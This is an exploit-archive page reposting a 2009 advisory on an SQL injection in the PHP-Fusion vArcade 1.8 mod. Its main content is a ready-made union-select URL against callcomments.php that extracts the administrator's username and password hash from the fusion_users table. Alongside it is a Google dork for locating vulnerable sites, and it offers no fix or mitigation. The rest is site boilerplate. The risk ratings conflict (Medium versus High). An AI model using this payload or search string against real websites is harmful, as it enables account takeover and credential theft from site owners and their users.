PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability

2009-01-08 / 2009-01-09

Credit: irancrash

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

 ----------------------------------------------------------------

Script : PHP-Fusion Mod vArcade 1.8

Type : Sql Injection Vulnerability

Risk : High

----------------------------------------------------------------

Download From : http://venue.nu/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

My Official Website : http://FEREIDANI.IR

Our Team Website : http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Sql Injection Vulnerability :

Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*

Google Dark : inurl:/infusions/varcade/

----------------------------------------------------------------

                        Tnx : God

          http://IRCRASH.COM http://FEREIDANI.IR

----------------------------------------------------------------

References:

http://seclists.org/bugtraq/2009/Jan/0044.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.